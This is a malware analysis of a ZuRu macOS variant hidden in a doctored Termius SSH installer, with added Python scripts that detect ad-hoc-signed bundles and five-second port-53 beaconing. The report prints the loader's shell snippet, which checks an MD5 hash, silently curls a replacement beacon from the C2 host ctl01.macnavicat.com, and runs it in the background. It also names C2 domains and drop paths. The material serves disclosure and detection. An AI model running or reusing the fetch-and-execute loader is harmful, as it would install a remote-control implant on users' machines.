New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users
A fresh strain of the long-running macOS.ZuRu family has surfaced, hiding inside a doctored copy of the popular Termius SSH client and quietly turning developer workstations into remote footholds.
First seen in late May 2025, the 248 MB rogue disk image looks and behaves like the genuine installer but stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.
Once launched, the counterfeit helper runs the legitimate .Termius Helper1 to preserve normal UX while spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon under /tmp/.fseventsd and begins polling its operator every five seconds over port 53.
Polyswarm analysts identified the sample’s C2 pattern—ctl01.macnavicat[.]com with the Baidu decoy domain—linking it to earlier ZuRu infrastructure.
Because the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s trust model is sidestepped, letting the bundle execute without notarization dialogs.
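The signature swap the report describes is cheap to check from the defender's side. The following Python is an added example, not code from the report or from Termius: it parses what Apple's `codesign -dvv <bundle>` prints and flags a bundle that is ad-hoc signed or whose certificate chain carries no Developer ID authority. The two sample outputs, the bundle identifiers, the install paths and the team ID are constructed placeholders.

```python
"""Triage check for ad-hoc-signed macOS bundles (added example, not the
report's or Termius's code). Parses `codesign -dvv` output; samples below
are constructed, with placeholder identifiers and team ID."""
import subprocess
from dataclasses import dataclass, field


@dataclass
class SigInfo:
    identifier: str = ""
    adhoc: bool = False
    authorities: list = field(default_factory=list)


def parse_codesign(output: str) -> SigInfo:
    """Extract identifier, ad-hoc flag and certificate chain from codesign text."""
    info = SigInfo()
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Identifier="):
            info.identifier = line.split("=", 1)[1]
        elif line.startswith("Signature="):
            # codesign prints "Signature=adhoc" for ad-hoc signatures; a
            # certificate-backed signature prints "Signature size=N" instead.
            info.adhoc = line.split("=", 1)[1].strip().lower() == "adhoc"
        elif line.startswith("CodeDirectory") and "(adhoc)" in line:
            # the flags field also marks ad-hoc signatures: flags=0x2(adhoc)
            info.adhoc = True
        elif line.startswith("Authority="):
            info.authorities.append(line.split("=", 1)[1])
    return info


def is_suspicious(info: SigInfo) -> bool:
    """Ad-hoc signatures carry no certificate chain, so neither Gatekeeper nor
    notarization can attribute the bundle to a developer; a shipped app should
    chain to a Developer ID Application certificate."""
    if info.adhoc:
        return True
    return not any(a.startswith("Developer ID Application:") for a in info.authorities)


def check_bundle(path: str) -> SigInfo:
    """Live check on macOS; codesign writes the signature details to stderr."""
    proc = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True)
    return parse_codesign(proc.stderr)


# Constructed sample: a vendor-signed app (placeholder identifier and team ID).
SIGNED_SAMPLE = """\
Executable=/Applications/Termius.app/Contents/MacOS/Termius
Identifier=com.example.termius
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=9000
Authority=Developer ID Application: Example Developer (TEAMID0000)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
"""

# Constructed sample: a helper bundle re-signed ad hoc, as the report describes.
ADHOC_SAMPLE = """\
Executable=/Volumes/Installer/Termius.app/Contents/Helpers/Termius Helper.app/Contents/MacOS/Termius Helper
Identifier=com.example.termius.helper
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20400 size=512 flags=0x2(adhoc) hashes=10+2 location=embedded
Signature=adhoc
"""

if __name__ == "__main__":
    for name, sample in (("signed", SIGNED_SAMPLE), ("adhoc", ADHOC_SAMPLE)):
        info = parse_codesign(sample)
        print(name, info.identifier, "SUSPICIOUS" if is_suspicious(info) else "ok")
```

On a real host, run `check_bundle("/Applications/Termius.app")` and the same for each helper bundle under `Contents/Helpers`; the nested helper is where the report says the tampered binary lives, so checking only the outer app is not enough.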
The campaign specifically targets IT staff and software engineers who favor third-party terminals, underscoring the growing risk posed by pirated or tampered productivity apps.
Beyond data theft, the enhanced beacon can transfer arbitrary files, run shell instructions, and capture output, granting operators persistent, high-fidelity control of compromised Macs.
The remainder of this report drills into the infection mechanism that makes ZuRu’s latest build both elusive and resilient.
The loader’s first task is integrity verification. It computes an MD5 hash of the resident beacon and, if the result diverges from the hard-coded checksum, silently refreshes it from the C2 before chaining execution back to the user’s session.
The logic is compact yet effective:

    # hard-coded MD5 of the Khepri beacon the loader expects to find on disk
    EXPECTED_HASH="8ac593fbe69ae93de505003eff446424"
    CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
    # on mismatch, silently re-download the beacon from the C2
    [ "$CURRENT_HASH" != "$EXPECTED_HASH" ] && curl -s http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
    # then launch it in the background and return control to the user's session
    chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &
This self-healing step thwarts rudimentary file-based detections by ensuring the payload is always pristine.
Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency access even across reboots, highlighting how a single compromised utility can cascade into full-scale network exposure for macOS-centric engineering teams.
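Two of the behaviours described above are detectable without a copy of the binary: the fixed five-second heartbeat on port 53 and the drop location /tmp/.fseventsd/Khepri. The Python below is an added example, not the report's code: it groups a connection log by source and destination, flags pairs whose port-53 connections recur at a near-constant interval close to 5 s, and checks for the dropped path. The log lines, their four-column format (timestamp, source, destination, destination port) and the 203.0.113.10 address standing in for the C2 are constructed; adapt the parser to your own sensor's format.

```python
"""Beacon-interval and dropped-file check for the ZuRu Khepri implant
(added example, not the report's code). The connection log and the
203.0.113.10 address are constructed; 10.0.0.1 plays the site resolver."""
import os
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log: timestamp  src  dst  dport. 10.0.0.12 talks to the stand-in
# C2 every 5 s and to the resolver at irregular times; 10.0.0.7 is benign.
SAMPLE_LOG = """\
2025-05-30T10:00:00Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:02Z 10.0.0.12 10.0.0.1 53
2025-05-30T10:00:05Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:10Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:11Z 10.0.0.12 10.0.0.1 53
2025-05-30T10:00:15Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:25Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:20Z 10.0.0.12 203.0.113.10 53
2025-05-30T10:00:37Z 10.0.0.12 10.0.0.1 53
2025-05-30T10:00:38Z 10.0.0.12 10.0.0.1 53
2025-05-30T10:00:59Z 10.0.0.12 10.0.0.1 53
2025-05-30T10:00:00Z 10.0.0.7 10.0.0.1 53
"""

# Paths the report names as the beacon's drop location.
IOC_PATHS = ("/tmp/.fseventsd", "/tmp/.fseventsd/Khepri")


def parse_log(text):
    """Group port-53 connection timestamps by (src, dst); skip malformed lines."""
    events = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, dport = parts
        if dport != "53":
            continue
        events[(src, dst)].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    return events


def find_beacons(text, expected=5.0, tolerance=1.0, jitter=0.5, min_events=5):
    """Return (src, dst, mean_gap) for pairs whose inter-connection gaps average
    within `tolerance` of `expected` seconds and vary by at most `jitter`.
    Ordinary DNS lookups are bursty and irregular, so they fall outside both."""
    hits = []
    for (src, dst), times in parse_log(text).items():
        if len(times) < min_events:
            continue
        times.sort()  # sensors do not always emit events in time order
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if abs(avg - expected) <= tolerance and pstdev(gaps) <= jitter:
            hits.append((src, dst, round(avg, 2)))
    return hits


def present_iocs(exists=os.path.exists):
    """Return the dropped-file paths that exist; the predicate is injectable
    so the check can be exercised against a recorded file listing."""
    return [p for p in IOC_PATHS if exists(p)]


if __name__ == "__main__":
    print("periodic port-53 pairs:", find_beacons(SAMPLE_LOG))
    print("dropped artifacts present:", present_iocs())
```

The resolver traffic in the sample is deliberately irregular (gaps of 9, 26, 1 and 21 seconds), so only the pair with the constant 5 s cadence is reported. Tighten `jitter` if the implant's heartbeat is steady on your network, loosen it if your sensor timestamps at coarse resolution.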